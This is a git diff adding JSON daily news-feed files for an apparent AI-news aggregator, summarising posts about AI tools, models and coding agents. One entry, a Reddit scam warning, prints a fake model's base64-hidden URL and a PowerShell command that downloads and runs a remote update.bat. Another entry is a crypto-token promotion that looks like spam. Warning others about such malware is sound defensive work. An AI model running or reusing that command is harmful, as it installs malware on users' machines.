"tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T20:39:46.000Z", + "summary": "A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the \"understanding-generation gap\" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. This suggests that the model's \"understanding\" capacity is much stronger than its \"generative\" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. It produces a \"grounded evaluation\" in text, pinpointing exactly what is wrong (e.g., \"Missing a bicyc…", + "category": "creative_tools" + }, + { + "title": "Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-06T20:13:39.000Z", + "summary": "Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedbacks are welcome!**", + "category": "ai_tools" + }, + { + "title": "Internal tools wIth no MCP", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-06T11:46:48.000Z", + "summary": "We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. Im trying to figure out what and how the best way is to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP.", + "category": "ai_tools" + }, + { + "title": "Show HN: Adam – An embeddable cross-platform AI agent library", + "url": "https://github.com/sqliteai/adam", + "source": "Hacker News", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.96, + "date": "2026-05-06T12:56:29.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-06T20:36:19.000Z", + "summary": "Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. A lot of you asked \"cool, where's the code?\" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \\~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \\~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \\~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \\~87 tok/s Nemotron-3 Nano 30B (FP8): \\~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco…", + "category": "ai_models" + }, + { + "title": "Anyone else tried this RefineAnything LoRA? Pretty impressed so far", + "url": "https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T19:32:13.000Z", + "summary": "Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I…", + "category": "creative_tools" + }, + { + "title": "I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-06T18:46:20.000Z", + "summary": "I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. # Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. (We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my…", + "category": "ai_models" + }, + { + "title": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one pai…", + "url": "https://x.com/NovaByArun/status/2052077319960047791", + "source": "X search / AI vibes", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-06T17:25:33.000Z", + "summary": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one painful workflow. one credible audience.", + "category": "ai_tools" + }, + { + "title": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", + "url": "https://x.com/AzaleasWatkin/status/2052075760354238868", + "source": "X search / Agent workflows", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-06T17:19:21.000Z", + "summary": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", + "category": "ai_agents" + }, + { + "title": "I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?", + "url": "https://x.com/MichaelAzmy/status/2052075579424334002", + "source": "X search / AI model updates", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-06T17:18:38.000Z", + "summary": "I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-07.json b/data/news-feed-2026-05-07.json new file mode 100644 index 0000000..1af29d9 --- /dev/null +++ b/data/news-feed-2026-05-07.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:38.227Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-07", + "article_count": 15, + "archived_story_count": 548, + "articles": [ + { + "title": "I embedded an AI agent in my shell. It can now run interactive programs.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source", + "developer_tool", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "open_source", + "developer_tool", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-07T21:18:26.000Z", + "summary": "I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te…", + "category": "ai_models" + }, + { + "title": "I just tried Reactor's open source world model demo, here are my thoughts", + "url": "https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-07T23:02:18.000Z", + "summary": "So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think!", + "category": "creative_tools" + }, + { + "title": "My Claude dreams at night and remembers everything. Better than mempalace.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "tool_update" + ], + "matching_tags": [ + "mcp", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-07T03:08:34.000Z", + "summary": "Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No \"remember this.\" No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. Five months…", + "category": "ai_tools" + }, + { + "title": "Claude Code: the only CLI where scrolling up is a premium feature", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-07T16:38:48.000Z", + "summary": "Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo \"hello world\" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The \"workarounds\": \\- Ctrl+O transcript mode — congrats, you can now read your conversation history, but Claude is frozen while you do. It's like being told \"you can look at your notes, but only if you stop the meeting.\" \\- iTerm2's \"Save lines to scrollback\" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \\- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. But this is the equivalent of shi…", + "category": "ai_tools" + }, + { + "title": "why llama.cpp can’t combine speculative decode methods?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-07T07:53:13.000Z", + "summary": "dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! [https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673)", + "category": "ai_models" + }, + { + "title": "ClaudePlaysPokemon Opus 4.7 run ongoing!", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-07T02:54:10.000Z", + "summary": "Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the…", + "category": "ai_tools" + }, + { + "title": "Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…", + "url": "https://x.com/xai/status/2052193877675983031", + "source": "X / @xai", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-07T01:08:43.000Z", + "summary": "Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business professionals.", + "category": "ai_tools" + }, + { + "title": "[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-07T00:40:51.000Z", + "summary": "Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \\- /remove (BiRefNet + pymatting matting refinement) \\- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \\- /face-restore (GFPGAN v1.4) \\- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \\- /useknockout/node \\- /useknockout/react \\- /useknockout/cli \\- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! would be greatly appreciated!", + "category": "ai_models" + }, + { + "title": "How I made $350K from an open-source JavaScript library using dual licensing", + "url": "https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-07T00:47:15.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-07T20:56:47.000Z", + "summary": "I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \\[\\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an…", + "category": "ai_models" + }, + { + "title": "[SCAM DO NOT USE!!] OpenOSS/privacy-filter", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-07T18:31:54.000Z", + "summary": "Hey there! I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { \"cmd\": \"\\[Net.ServicePointManager\\]::SecurityProtocol=\\[Net.SecurityProtocolType\\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o\" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention!", + "category": "ai_models" + }, + { + "title": "I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-07T18:01:36.000Z", + "summary": "**TL;DR**: Released en\\_legal\\_ner\\_ind\\_trf v0.1 - InLegalBERT fine-tuned on \\~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. **Results** |Entity|F1|Support| |:-|:-|:-| |CASE\\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. Not…", + "category": "ai_research" + }, + { + "title": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…", + "url": "https://x.com/AILeaksAndNews/status/2052440501421281507", + "source": "X search / AI model updates", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-07T17:28:42.000Z", + "summary": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI?", + "category": "ai_models" + }, + { + "title": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", + "url": "https://x.com/DaveLimTV/status/2052440075766817143", + "source": "X search / Agent workflows", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-07T17:27:01.000Z", + "summary": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", + "category": "ai_agents" + }, + { + "title": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", + "url": "https://x.com/testingcatalog/status/2052439728838808031", + "source": "X / @testingcatalog", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-07T17:25:38.000Z", + "summary": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-08.json b/data/news-feed-2026-05-08.json new file mode 100644 index 0000000..464909f --- /dev/null +++ b/data/news-feed-2026-05-08.json @@ -0,0 +1,261 @@ +{ + "generated": "2026-06-05T00:44:38.433Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-08", + "article_count": 15, + "archived_story_count": 552, + "articles": [ + { + "title": "I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions", + "url": "https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-08T22:00:25.000Z", + "summary": "Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below).", + "category": "ai_tools" + }, + { + "title": "vLLM ROCm has been added to Lemonade as an experimental backend", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-08T18:21:15.000Z", + "summary": "vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", + "category": "ai_models" + }, + { + "title": "Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…", + "url": "https://x.com/brainmirrorai/status/2052712658236060043", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-08T11:30:09.000Z", + "summary": "Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a", + "category": "ai_models" + }, + { + "title": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 mil…", + "url": "https://x.com/mariusfanu/status/2052712647468917204", + "source": "X search / AI model updates", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-08T11:30:07.000Z", + "summary": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this", + "category": "ai_models" + }, + { + "title": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…", + "url": "https://x.com/AgentBreak40737/status/2052645145011695940", + "source": "X search / AI model updates", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-08T07:01:53.000Z", + "summary": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also fixes key bugs like streaming response ...", + "category": "ai_models" + }, + { + "title": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…", + "url": "https://x.com/aicontentminds/status/2052637566474883305", + "source": "X search / AI model updates", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-08T06:31:46.000Z", + "summary": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac", + "category": "ai_models" + }, + { + "title": "I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-07T22:18:56.000Z", + "summary": "I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from 